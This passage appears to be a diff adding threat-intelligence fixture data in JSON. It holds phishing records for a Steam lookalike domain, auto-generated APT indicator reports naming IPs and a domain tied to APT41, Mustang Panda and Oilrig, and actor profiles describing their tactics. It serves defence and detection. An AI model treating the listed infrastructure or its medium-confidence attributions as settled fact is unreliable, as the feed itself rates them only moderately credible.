"renderedUrls": [ + "" + ] + }, + { + "id": "d3b85abb6f339983ae8378ac1d3d7b2bd28d9e07c6e6de7d42a34f46c99c2ad6", + "url": "http://accsteamorigin.sells.com.ua/empire-total-war/p2", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:09:09+03:00", + "detected": "2017-10-11T22:09:09+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": 
"UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "filetype": "pageHtml", + "filename": "h:35e7a745885e371b61eb3a8248c467f3dd934fc398d1739f18966b0e4d35af0e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "filetype": "pageScreen", + "filename": "s:543c98d243bbc39461aecc4d5cde25a7cf5b798e6b4d79bcc4ce68316bd9abbb", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "d21964c861da14ca52dc598458157e8ef38d2d75110e0244396290e0fd0c8bc3", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?size=10&=amp", + "date": { + "blocked": "2017-12-07T07:23:51+03:00", + "added": "2017-10-11T22:03:13+03:00", + "detected": "2017-10-11T22:03:13+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "filetype": "pageHtml", + "filename": "h:4d0fec164c571176d65b752a5f7412ee11f04400a0e0e34da337e2f080ae8ac9", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "filetype": "pageScreen", + "filename": 
"s:e1a659acc300693c1eefedd540c76109c2f2b4bdd53999f9cc188463683ba597", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "71fa641ca0260cf5097cdc94363af3cca077903d73ef51dbf84d2fe966da00e1", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2", + "date": { + "blocked": "2017-12-07T07:23:49+03:00", + "added": "2017-10-11T21:46:48+03:00", + "detected": "2017-10-11T21:46:48+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "filetype": "pageScreen", + "filename": "s:f84da9cc91c3708ce72861e19bbf854af534d2cf77ca0586432c0c123ddb0514", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52ebffd121be60515ce9403b425c11b7724b86c1259be50196e2b81c8cb70534", + "url": "http://accsteamorigin.sells.com.ua/products?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:11+03:00", + "detected": "2017-10-11T21:42:11+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + 
"domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "filetype": "pageHtml", + "filename": "h:f9b7a6cc1617e663eabde3527869f723ca4c496c9a8b8b40c4090d3be6877012", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "546c7738cd52d6882b34f1a93adb1ff9864ef59ca255be91e0afc815bd3927c8", + "url": "http://accsteamorigin.sells.com.ua/products/2?sort=name", + "date": { + "blocked": "2017-12-07T07:23:47+03:00", + "added": "2017-10-11T21:42:10+03:00", + "detected": "2017-10-11T21:42:10+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageHtml", + "filename": 
"h:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "filetype": "pageScreen", + "filename": "s:2a6262c9e361abb7bd31ff64d6070ad423eb62bdd5771dfad8827248ec6fb8c5", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "6551900a64bcb77261de7b9c885aa26effe30064872c17de2a1fc1d435573ee1", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=30", + "date": { + "blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:55+03:00", + "detected": "2017-10-11T21:30:55+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "filetype": "pageHtml", + "filename": "h:8e741caac344e2763637e42d22cffb812bd28d42e1d53ab1f714f27504eaa27e", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "filetype": "pageScreen", + "filename": "s:f9ff8e76dad9ec24da6ad9e133e73c7b111abeeb5e807cb15f8cb4ea2f83c836", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "ef1a653812575dde248b8de44a80d999e4b498aac53d56ab7af1cf6f1d7edb6b", + "url": "http://accsteamorigin.sells.com.ua/products?sort=name&size=10", + "date": { + 
"blocked": "2017-12-07T07:23:46+03:00", + "added": "2017-10-11T21:30:53+03:00", + "detected": "2017-10-11T21:30:53+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "filetype": "pageHtml", + "filename": "h:76f3775c680f1aae22fe62abdc5c330a1a49ea36ca104a9063a76a0a41ee7063", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "filetype": "pageScreen", + "filename": "s:5973a2971f6ec1e730d69e7be8b7246b355dcf5dbebfac1b44d4c79fc89f4b9b", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "12c1361579bffe67dd10524c20390a8e749072fbb838c25d9ac918d074a096ca", + "url": "http://accsteamorigin.sells.com.ua/klyuchi-steam/c6?sort=name", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": 
"91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "filetype": "pageHtml", + "filename": "h:6c3cb8483e025939fe5862dc3f757b486172445c5aaeef53822dbc4ad0c4cdf1", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "filetype": "pageScreen", + "filename": "s:398180d20fc9854acaad4f78ed9f3e851d0fce936ff41cf6ea461e1711e19998", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "c3078d9cb7c580110c854c8a4c041655d012278626680a02b0bb985ab952ba0f", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=1", + "date": { + "blocked": "2017-12-07T07:23:42+03:00", + "added": "2017-10-11T21:23:28+03:00", + "detected": "2017-10-11T21:23:28+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": 
"" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "fcd6b9e192152cd4103b465cdfe7a539f5a0c76b5764b458aa68b1c0002b7e45", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2/2?sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:41+03:00", + "added": "2017-10-11T21:11:27+03:00", + "detected": "2017-10-11T21:11:27+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "filetype": "pageHtml", + "filename": "h:8e9d461ed5cf4f874cead72e4d7f901afc3d1527dd6b3b00557803e250e69cce", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "filetype": "pageScreen", + "filename": "s:7e820107f712a853286fbfa04052d9f8649b32da6f6f9b6f8870ddc7173d61d1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "38f94514e569b81b0fe264da5d48c93677332a017d217ac35bb59e369c7f34ab", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=cheap", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:53:30+03:00", + "detected": "2017-10-11T20:53:30+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + 
"title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "filetype": "pageHtml", + "filename": "h:e77a6f04ea5e6b2e7aab924a36739cfc01ff514939bd44dc49c08a87a97b8477", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bbee01e256e188625648aa5fe8c9db2d7b7298b6d03b229e24e1018617d45c0e", + "url": "http://accsteamorigin.sells.com.ua/products?sort=cheap&size=30", + "date": { + "blocked": "2017-12-07T07:23:40+03:00", + "added": "2017-10-11T20:36:03+03:00", + "detected": "2017-10-11T20:36:03+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + 
"hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + } + ], + "displayOptions": { + "isFavourite": false, + "isHidden": false + } + } + ], + "seqUpdate": 1430425612098642 + }, + "apt/threat":{ + "count": 57, + "items": [ + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-23T23:20:09+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-24", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n APT41. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

95[.]179[.]134[.]240

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "description": null, + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "95.179.134.240" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271228138607, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-2320", + "sectors": [], + "seqUpdate": 17271360303706, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "name": "APT41" + }, + "title": "APT41 - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-24T03:00:30+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T03:50:06+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-24", + 
"dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Mustang Panda. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

--

147[.]78[.]12[.]202

-
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "d2fbd8a75768de39f022b3173babc0e7ec64a521", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": null, + "ipv4": [ + "147.78.12.202" + ], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271390119447, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "375efaa5e042b289579c147dd1c95d9b8ccdbee4" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0350", + "sectors": [], + "seqUpdate": 17272224218059, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "CN", + "id": "06aea4ef831ae0fe5c97348e47901fc7293ebd40", + "isAPT": true, + "name": "Mustang Panda" + }, + "title": "Mustang Panda - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:21+03:00" + }, + { + "contacts": [], + "countries": [], + "createdAt": "2024-09-24T08:50:11+03:00", + "cveList": [], + "dateFirstSeen": 
"2024-09-24", + "dateLastSeen": "2024-09-24", + "datePublished": "2024-09-25", + "description": "\n
\n    This report is published automatically.\n

\n During daily monitoring of malicious infrastructure the Group-IB Threat Intelligence detected the following indicators:\n

\n\n
  • hosts (1)

\n The disclosed indicators with medium/medium-high confidence belong to the\n Oilrig. The indicators have already been used or will be used in future attacks.\n

\n\n

\n Source description:\n

\n
  • \n Group-IB hunting rules – information received as a result of detecting by hunting rule.\n

Detected network indicators:

\n\n \n \n \n \n \n \n \n \n \n \n \n \n
SourceURLDomainIPRelated malware

Group-IB hunting rules

-wehermes[.]com--
", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "4ffc68d1fd5cd6a2084c8284256be7651aafa84b", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": "wehermes.com", + "ipv4": [], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271570168080, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "0a3f9339b944b7976bbbccf6a695592ce97b7523" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0850", + "sectors": [], + "seqUpdate": 17272224279604, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "IR", + "id": "ea7951d222a76335539dfe8774fd24dba6770139", + "isAPT": true, + "name": "Oilrig" + }, + "title": "Oilrig - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:27+03:00" + } + ], + "seqUpdate": 17272224279604 + }, + "apt/threat_actor":{ + "count": 19, + "items": [ + { + "addedToThreatLandscapeFor": null, + "aliases": [ + 
"CamoFei" + ], + "country": "CN", + "createdAt": "2019-02-20T17:44:21+00:00", + "description": "

Experts gave the group the name ChamelGang (from the word 'chameleon'), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google. The attackers employed two methods. They acquired domains that imitate legitimate ones. In addition, the APT group placed SSL certificates that also imitated legitimate ones on its servers. To achieve their goal, the attackers used a trending penetration method—supply chain. The group compromised a subsidiary and penetrated the target company's network through it.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [ + { + "hash": "23f780c4ad6cdc16989acdb4f218712ba1d2d038e9c057026e54249b031957a3", + "mime": "image/png", + "name": "23f780c4ad6cdc16989acdb4f218712ba1d2d038e9c057026e54249b031957a3", + "size": 60084 + } + ], + "goals": [], + "hasIocs": true, + "id": "de70f8194526173b885baf2999f65225927c2f31", + "isAPT": true, + "labels": [], + "langs": [ + "en", + "ru" + ], + "name": "ChamelGang", + "oldId": null, + "roles": [], + "seqUpdate": 17274816349479, + "spokenOnLangs": [ + "en" + ], + "stat": { + "allIndicatorsCount": 51, + "allReportsCount": 6, + "contactsCount": 4, + "countries": [ + "BR", + "IN", + "JP", + "RU", + "TW", + "US" + ], + "cve": [], + "dateFirstSeen": "2022-11-01", + "dateLastSeen": "2024-09-28", + "expertise": [ + "AutoReport", + "Brief Report", + "Ransomware" + ], + "forumsAccountsCount": 0, + "malware": [ + "CatB", + "Cobalt Strike" + ], + "regions": [ + "america:northern_america", + "america:south_america", + "asia", + "europe" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-28", + "id": "9c8d61663f8e4b2c58d9029238ac9b2e6d65793d", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-07", + "id": "fbb2d470aa4530fb2260b14346c4d62353463e29", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-07", + "id": "f8624dcf70b33a45e027e7fa68cc9d2ee3120092", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + } + ], + "sectors": [ + "government-and-military", + "health-care" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { 
+ "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-28T03:00:34+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [ + "BARIUM", + "Winnti", + "LEAD", + "WICKED SPIDER", + "WICKED PANDA", + "Blackfly", + "Suckfly", + "Winnti Umbrella", + "Double Dragon", + "HOODOO", + "RedGolf" + ], + "country": "CN", + "createdAt": "2020-05-20T16:23:32+03:00", + "description": "

A China-sponsored criminal group with dual attack goal (cyber espionage and financial benefit) that has been active since at least 2007. 

Area of interest

APT41 specializes in stealing digital certificates for use in operations involving user data theft (cyber espionage), as well as placing cryptominers and ransomware on devices. Previously, the group's goals were also currency manipulation in online games and theft of intellectual property.

Alternative names

The network penetration operations are called WICKEDPANDA, while those related to financial gain are called WICKED SPIDER. In the Microsoft classification, attacks on the video game and technology industry are usually called BARIUM, and cyber espionage operations are called LEAD.

C2 servers special character

The second-level domains consonant with the name of the legitimate company were used with no routed localhost IP-address in the A-record when inactive. After that, a third-level domain was created, which resolved to the IP address of the attackers' server. At the same time, the address of the legitimate site of the company was used for the second-level domain, as the attackers were mimicking.

General tools characteristics

The malware was distributed in the DLL library for a 64-bit version of Windows form and had the functionality of a Remote Administration Tool (RAT). Third-party utilities and frameworks were also used. The use of malware attributed to other groups has been noticed.

Samples feature 

The use of digital certificates issued for legitimate gaming software and obtained by compromising the manufacturer in attacks is one of the main features of this group. In addition, there is information about the use (including re-use) of such certificates in attacks by other Chinese cyber groups (APT17, APT20, APT31). Certificates are either delivered by agreement with the group, or distributed commercially in the shadow segment of the network.

Collaboration

